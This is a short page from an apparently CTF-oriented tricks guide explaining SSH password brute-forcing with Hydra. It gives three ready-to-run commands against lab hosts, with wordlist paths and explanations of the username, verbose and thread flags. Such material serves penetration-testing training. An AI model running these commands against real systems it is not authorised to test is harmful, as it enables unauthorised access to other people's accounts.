> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/bruteforce/ssh/trick-0444.md).

# SSH Bruteforce using Hydra

***

Bruteforce SSH for a known user using a password list.

Utilize Hydra specifying the target username (`-l`), the path to the password list (`-P`), the target host, and the service (`ssh`).

```bash
hydra -l iamaweakuser -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local ssh
```

The target username `iamaweakuser` was previously identified (e.g., from `/etc/passwd`). The command attempts each password from the provided wordlist against the specified user on the target SSH service.

Here, `-l` specifies the username (e.g., root), `-P` specifies the path to the password list file (e.g., /root/password.txt), the target host (IP address or hostname) is specified next, and `ssh` is the service protocol.

For verbose output during the process, the `-V` option can be added.

```bash
hydra -l root -P /root/Desktop/pass.txt 192.168.1.101 ssh -V
```

To control the number of parallel tasks or threads, the `-t` option is used.

```bash
hydra -l user -P passlist.txt -t 16 ssh://target
```
